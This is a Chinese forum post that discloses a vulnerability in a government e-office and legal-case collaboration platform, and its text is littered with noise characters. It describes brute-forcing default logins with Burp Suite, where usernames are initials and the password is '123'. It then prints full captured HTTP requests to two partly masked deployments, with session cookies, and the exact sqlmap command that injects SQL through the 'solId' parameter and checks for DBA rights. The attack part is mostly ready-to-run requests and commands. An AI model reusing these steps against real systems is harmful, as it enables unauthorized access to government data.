|
, a8 r% A6 A/ C) K, i. O1 q% t- s
7 |& K& J3 f' A% ?1 F/ Z- z - ] a6 F5 e/ c4 C4 m7 d" q
7 v0 r; m0 l# | z+ E. ]) ~! ~" ~. ^ 平台简介:8 a, `% y6 v. Y4 f) ]% h( n
2 \5 A0 J! h1 s4 j) w, H0 W2 V: w1 ~% P' e2 m- A P
/ D6 v2 X& Z3 [" h8 m2 |) \
( N k1 @3 p6 W- q% F& W7 G! Q( C7 e
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
. U& u& c& L8 U8 f同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
2 ~- G3 x! F0 q同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
0 r& `/ v2 D1 P, Q% D & A9 U# {. {# G& p" i, B4 O* M
8 Q0 {6 g7 a8 a9 h$ x. R, n: Z. N
% B7 F) S r5 A3 ], P: n6 _5 s
0 ^9 E8 d) x# a$ v8 I
" p- C3 M4 j, X8 b 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
) ?* i6 p6 d) `' N* w2 }2 O2 P
8 x0 }! l' T: y9 n$ R- _+ j
# w9 N; B, Q2 n4 `
# |; b% e1 Q; B. d. ]* q% C
" d3 h6 [3 O8 N$ ?/ |
6 q( G( S! \+ \( W$ e* l http://1.1.1.1:7197/cap-aco/#(案例2-) O/ C. ~: h; Z( S9 {2 ~2 u8 Z
( a, C2 b: ^) y- C q
6 ?. J- |# X* a+ J( m5 V* ]) n http://www.XXOO.com (案例1-官网网站)
& J5 T/ G& ? H. Z- _8 R2 F( a
6 q5 w M, n, t1 O, J
* Q2 k/ G% s/ h c" t' i
. y5 y- {9 O- Q3 K1 t ' y( |- H) F: _/ V& N# ]8 U2 c/ a
7 m2 D+ O' w( J! i$ X
漏洞详情:$ |# u* u, U3 L7 j! d6 T( i, S
$ x2 Q! p% y+ K
) S0 l3 o+ i0 _ 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试9 \/ f5 n, i! v5 v) i3 r
) ~! ]+ b: G- O6 P# o( W; [ M4 M
5 t- P) V2 P1 F' z. \ 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:- k) f9 q/ s5 A. s' |/ O
; k8 v: H2 e8 m0 m, m: f0 ~: I* V9 Y# N
|/ H! x6 G+ n3 e* O% { & i! W4 N9 h. x' c: b# i3 f
+ l2 }3 l# R: W0 e; a* L( R
9 C. A) [6 ?6 z5 @ 
6 I7 Y4 D* _5 a 3 o9 P7 z: S( t
# a, O% l' W/ f/ }. J( _
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
2 B6 G9 j+ S, f3 c, H + d8 l% o) G7 a8 N6 t
, A; M2 ~ S8 V
1、案例1-官方网站
% s% a; `& R' |0 u3 f0 v, ~3 J9 w . c9 L0 \0 Z- n X
. F# R1 [7 v/ k4 @1 i; ~. N! K& F GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
% Z' N* \$ u/ k" ?
4 v. M+ L+ }# V" P0 w8 y1 U
4 F7 C5 q* I M1 Y Host: www.XXOO.com8 b; O! g' y' e8 f* F
6 p$ U2 c9 p" e+ U, b; U# P2 Z/ H" ^2 k \2 _
Proxy-Connection: Keep-Alive' U" q% I8 A# i: h) l0 h' w% g
1 y: L4 E9 P5 A& F9 H9 X# j
5 ]) M8 z( V1 h( U( ^ Accept: application/json, text/javascript, */*; q=0.01 ^. d/ w1 D" k. U- F
- `+ w5 V& }* q# c. h( s
" L4 ^% o6 W# q" O0 K7 y: s Accept-Language: zh-CN& W2 u; x: ^$ A5 B* b
7 J* I8 \$ K1 v
9 }9 v; i6 j' o5 y Content-Type: application/json$ u/ Y' [4 {; Y1 [% v& Z
% Q5 H3 P, K9 |2 S8 I" y1 B
0 a/ y$ E+ ?1 s3 v' A `7 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko m, m: e7 y4 Z6 B9 c4 h& j
% P+ S9 `, t2 P
8 ^ Z* b0 W+ ]) N& t* G X-Requested-With: XMLHttpRequest7 w7 }7 w4 r( h( {0 J( P! x0 e
% _: I7 @* e3 }% J
/ S2 V4 m7 I8 i; }: H
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M0020 T. M4 ]3 o v; |+ I0 C1 U6 ]0 ]
8 j2 E) g( ~, n' s$ f; i
- j2 w4 t4 f3 Z9 D2 D6 Q# t Accept-Encoding: gzip, deflate, sdch' F+ A+ S4 L$ D1 x
. b, `7 A2 a7 {5 c+ z
- y F/ k$ m: _+ K2 [ Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
+ u' i9 H3 q3 V% x5 B h
! A6 u! `" e8 i$ v( _# E4 ]3 n [! g$ ?6 d
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:" F, K! `- k4 ?( Q2 w& k% c. W3 c
$ b; d; @* w& I: u1 o M3 p
/ n* q. F, D# r6 Z* z! y
# Q5 u: p8 ]9 q% \ 8 U+ r7 m: v7 M$ N# B
& P! q5 Q8 M# l8 y5 K
 6 O& Q0 D/ ?+ u+ ~% Y0 n) ]* j
5 J: U3 b# F- M7 F3 M+ `! Y! D9 @5 \* T+ F5 r7 e
: `* m( `3 |5 A$ i, [
3 G' Z: I% [3 p
2 x, y) X h$ V0 u) [/ i
: s, B0 X5 n. m @ ) S1 V% C) Q) K' U! ^
. T+ w. W6 ~" z
" q- A6 {" G6 y; }& w9 V 4 k) s5 c1 R" S, [" x
, V9 S2 g) }3 }& ~9 y% _6 g' K 2、案例2-某天河云平台
0 b0 G9 a, q s* O / u k" N S+ O& j1 w
( J1 ]" o* Y1 C
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.17 W5 z# S0 t5 a, ]$ q9 q( D
% t5 i* m- S) ~* M
+ k0 y) d F; ^2 w& ^ Host: 1.1.1.:7197
) f5 _$ k% r) H( R; g8 V% ^" Z ( @, O9 Z# Z9 o; P7 k
5 i# D7 [0 s$ l" K" B0 O, S
Accept: application/json, text/javascript, */*; q=0.01
% ^6 u4 }0 K. x* o# \* w
( f/ E' v$ s2 ^* V0 k5 p: L9 b1 W3 G$ {
X-Requested-With: XMLHttpRequest
) r" _0 m! r6 X g% d' y
4 n) U' t2 J* p; N' d0 w7 {; j8 g- h# b
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
8 o7 |: R Q' f0 x, i2 e% e 0 ?5 Q' l/ O0 t G1 T
+ U. V/ H" X8 P2 M4 y8 ?$ w8 {: O: R4 U
Content-Type: application/json5 j3 l$ h" O* Z9 C( l# l- {3 s7 a
& `, g1 j* P% f: ^* g
! I3 d! ~1 S. r0 n4 o" _. i h z Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10089 |( j5 }1 ^; C4 Z- C' @
# a0 h: P7 e/ S8 T: d2 _: W/ J7 W
8 c6 J: w; H$ H6 Q
Accept-Language: zh-CN,zh;q=0.8
$ @3 A, Y9 l( \ $ z( p9 y, |: K1 t5 _( L
# |, E) w# j( b- @3 k I
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
& B m( _4 t" ]/ z6 z4 X
# s# a; Z6 l3 f3 H
( f2 f6 N( e& d" j9 u( h" ~ Connection: close
- x! D) k* Z& |! ~0 q* Z* L
1 ]3 ?! \0 g' q# O
7 D& `7 q: j; K 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
6 R$ P1 e% q4 j% c4 A
) V, \1 Q q3 i4 n+ ?# H! I" F. q( W
$ }. h5 `6 c' N7 v! E* ?7 v 
) s B5 S; D2 I6 @* E$ A : @5 Y5 W- L! Z( }$ A2 t7 `
* u6 u4 O# S7 k3 L
, g( p. }. o5 y3 T$ l5 f
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对